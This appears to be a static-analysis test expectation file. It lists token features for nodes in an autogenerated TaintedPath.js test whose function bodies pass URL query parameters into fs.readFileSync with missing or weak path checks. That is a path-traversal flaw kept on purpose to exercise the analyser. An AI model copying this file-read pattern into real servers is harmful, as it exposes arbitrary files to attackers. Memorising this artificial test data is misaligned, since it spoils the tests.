join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:60:3:60:11 | res.write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:60:3:60:11 | res.write | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:60:3:60:63 | exceptional return of res.wri ... path))) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:60:3:60:63 | exceptional return of res.wri ... path))) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:60:3:60:63 | exceptional return of res.wri ... path))) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:60:3:60:63 | exceptional return of res.wri ... path))) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:60:3:60:63 | exceptional return of res.wri ... path))) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:60:3:60:63 | res.wri ... path))) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:60:3:60:63 | res.wri ... path))) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:60:3:60:63 | res.wri ... path))) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:60:3:60:63 | res.wri ... path))) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:60:3:60:63 | res.wri ... path))) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:60:7:60:11 | write | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:60:7:60:11 | write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:60:7:60:11 | write | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:60:7:60:11 | write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:60:7:60:11 | write | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:60:13:60:14 | fs | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:60:13:60:14 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:60:13:60:14 | fs | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:60:13:60:14 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:60:13:60:14 | fs | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:60:13:60:27 | fs.readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:60:13:60:27 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:60:13:60:27 | fs.readFileSync | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:60:13:60:27 | fs.readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:60:13:60:27 | fs.readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:60:13:60:62 | exceptional return of fs.read ... (path)) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:60:13:60:62 | exceptional return of fs.read ... (path)) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:60:13:60:62 | exceptional return of fs.read ... (path)) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:60:13:60:62 | exceptional return of fs.read ... (path)) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:60:13:60:62 | exceptional return of fs.read ... (path)) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:60:13:60:62 | fs.read ... (path)) | CalleeFlexibleAccessPath | res.write | | autogenerated/TaintedPath/TaintedPath.js:60:13:60:62 | fs.read ... (path)) | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:60:13:60:62 | fs.read ... (path)) | contextFunctionInterfaces | views_local(req, res) | @@ -5242,6 +60322,26 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:60:13:60:62 | fs.read ... (path)) | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:60:13:60:62 | fs.read ... (path)) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:60:13:60:62 | fs.read ... (path)) | receiverName | res | +| autogenerated/TaintedPath/TaintedPath.js:60:16:60:27 | readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:60:16:60:27 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:60:16:60:27 | readFileSync | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:60:16:60:27 | readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:60:16:60:27 | readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:60:29:60:38 | pathModule | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:60:29:60:38 | pathModule | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:60:29:60:38 | pathModule | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:60:29:60:38 | pathModule | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:60:29:60:38 | pathModule | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:60:29:60:55 | pathMod ... cedPath | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:60:29:60:55 | pathMod ... cedPath | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:60:29:60:55 | pathMod ... cedPath | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:60:29:60:55 | pathMod ... cedPath | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:60:29:60:55 | pathMod ... cedPath | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:60:29:60:61 | exceptional return of pathMod ... h(path) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:60:29:60:61 | exceptional return of pathMod ... h(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:60:29:60:61 | exceptional return of pathMod ... h(path) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:60:29:60:61 | exceptional return of pathMod ... h(path) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:60:29:60:61 | exceptional return of pathMod ... h(path) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:60:29:60:61 | pathMod ... h(path) | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/TaintedPath.js:60:29:60:61 | pathMod ... h(path) | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:60:29:60:61 | pathMod ... h(path) | calleeImports | fs | @@ -5251,6 +60351,11 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:60:29:60:61 | pathMod ... h(path) | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:60:29:60:61 | pathMod ... h(path) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:60:29:60:61 | pathMod ... h(path) | receiverName | fs | +| autogenerated/TaintedPath/TaintedPath.js:60:40:60:55 | toNamespacedPath | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:60:40:60:55 | toNamespacedPath | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:60:40:60:55 | toNamespacedPath | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:60:40:60:55 | toNamespacedPath | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:60:40:60:55 | toNamespacedPath | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:60:57:60:60 | path | CalleeFlexibleAccessPath | pathModule.toNamespacedPath | | autogenerated/TaintedPath/TaintedPath.js:60:57:60:60 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:60:57:60:60 | path | calleeImports | path | @@ -5260,6 +60365,39 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:60:57:60:60 | path | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:60:57:60:60 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:60:57:60:60 | path | receiverName | pathModule | +| autogenerated/TaintedPath/TaintedPath.js:63:1:63:7 | angular | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:63:1:63:7 | angular | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:63:1:63:7 | angular | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:63:1:63:14 | angular.module | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:63:1:63:14 | angular.module | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:63:1:63:14 | angular.module | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:63:1:63:27 | angular ... p', []) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:63:1:63:27 | angular ... p', []) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:63:1:63:27 | angular ... p', []) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:63:1:63:27 | exceptional return of angular ... p', []) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:63:1:63:27 | exceptional return of angular ... p', []) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:63:1:63:27 | exceptional return of angular ... p', []) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:63:1:64:14 | angular ... rective | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:63:1:64:14 | angular ... rective | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:63:1:64:14 | angular ... rective | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:63:1:68:6 | angular ... \\n }) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:63:1:68:6 | angular ... \\n }) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:63:1:68:6 | angular ... \\n }) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:63:1:68:6 | exceptional return of angular ... \\n }) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:63:1:68:6 | exceptional return of angular ... \\n }) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:63:1:68:6 | exceptional return of angular ... \\n }) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:63:1:69:14 | angular ... rective | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:63:1:69:14 | angular ... rective | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:63:1:69:14 | angular ... rective | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:63:1:73:6 | angular ... \\n }) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:63:1:73:6 | angular ... \\n }) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:63:1:73:6 | angular ... \\n }) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:63:1:73:6 | exceptional return of angular ... \\n }) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:63:1:73:6 | exceptional return of angular ... \\n }) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:63:1:73:6 | exceptional return of angular ... \\n }) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:63:9:63:14 | module | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:63:9:63:14 | module | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:63:9:63:14 | module | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:63:16:63:22 | 'myApp' | CalleeFlexibleAccessPath | angular.module | | autogenerated/TaintedPath/TaintedPath.js:63:16:63:22 | 'myApp' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:63:16:63:22 | 'myApp' | contextFunctionInterfaces | views_local(req, res) | @@ -5272,26 +60410,144 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:63:25:63:26 | [] | contextSurroundingFunctionParameters | | | autogenerated/TaintedPath/TaintedPath.js:63:25:63:26 | [] | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:63:25:63:26 | [] | receiverName | angular | +| autogenerated/TaintedPath/TaintedPath.js:64:6:64:14 | directive | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:64:6:64:14 | directive | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:64:6:64:14 | directive | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:64:16:64:27 | 'myCustomer' | CalleeFlexibleAccessPath | angular.module().directive | | autogenerated/TaintedPath/TaintedPath.js:64:16:64:27 | 'myCustomer' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:64:16:64:27 | 'myCustomer' | contextFunctionInterfaces | views_local(req, res) | | autogenerated/TaintedPath/TaintedPath.js:64:16:64:27 | 'myCustomer' | contextSurroundingFunctionParameters | | | autogenerated/TaintedPath/TaintedPath.js:64:16:64:27 | 'myCustomer' | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:64:30:64:29 | this | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:64:30:64:29 | this | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:64:30:64:29 | this | enclosingFunctionBody | templateUrl SAFE | +| autogenerated/TaintedPath/TaintedPath.js:64:30:64:29 | this | enclosingFunctionName | directive#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:64:30:64:29 | this | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:64:30:68:5 | 'arguments' object of anonymous function | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:64:30:68:5 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:64:30:68:5 | 'arguments' object of anonymous function | enclosingFunctionBody | templateUrl SAFE | +| autogenerated/TaintedPath/TaintedPath.js:64:30:68:5 | 'arguments' object of anonymous function | enclosingFunctionName | directive#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:64:30:68:5 | 'arguments' object of anonymous function | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:64:30:68:5 | exceptional return of anonymous function | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:64:30:68:5 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:64:30:68:5 | exceptional return of anonymous function | enclosingFunctionBody | templateUrl SAFE | +| autogenerated/TaintedPath/TaintedPath.js:64:30:68:5 | exceptional return of anonymous function | enclosingFunctionName | directive#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:64:30:68:5 | exceptional return of anonymous function | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:64:30:68:5 | functio ... }\\n } | CalleeFlexibleAccessPath | angular.module().directive | | autogenerated/TaintedPath/TaintedPath.js:64:30:68:5 | functio ... }\\n } | InputArgumentIndex | 1 | | autogenerated/TaintedPath/TaintedPath.js:64:30:68:5 | functio ... }\\n } | contextFunctionInterfaces | views_local(req, res) | | autogenerated/TaintedPath/TaintedPath.js:64:30:68:5 | functio ... }\\n } | contextSurroundingFunctionParameters | () | | autogenerated/TaintedPath/TaintedPath.js:64:30:68:5 | functio ... }\\n } | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:64:30:68:5 | return of anonymous function | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:64:30:68:5 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:64:30:68:5 | return of anonymous function | enclosingFunctionBody | templateUrl SAFE | +| autogenerated/TaintedPath/TaintedPath.js:64:30:68:5 | return of anonymous function | enclosingFunctionName | directive#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:64:30:68:5 | return of anonymous function | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:65:16:67:9 | {\\n ... } | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:65:16:67:9 | {\\n ... } | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/TaintedPath.js:65:16:67:9 | {\\n ... } | enclosingFunctionBody | templateUrl SAFE | +| autogenerated/TaintedPath/TaintedPath.js:65:16:67:9 | {\\n ... } | enclosingFunctionName | directive#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:65:16:67:9 | {\\n ... } | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:66:13:66:23 | templateUrl | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:66:13:66:23 | templateUrl | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/TaintedPath.js:66:13:66:23 | templateUrl | enclosingFunctionBody | templateUrl SAFE | +| autogenerated/TaintedPath/TaintedPath.js:66:13:66:23 | templateUrl | enclosingFunctionName | directive#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:66:13:66:23 | templateUrl | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:66:13:66:31 | templateUrl: "SAFE" | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:66:13:66:31 | templateUrl: "SAFE" | contextFunctionInterfaces | views_local(req, res) | +| 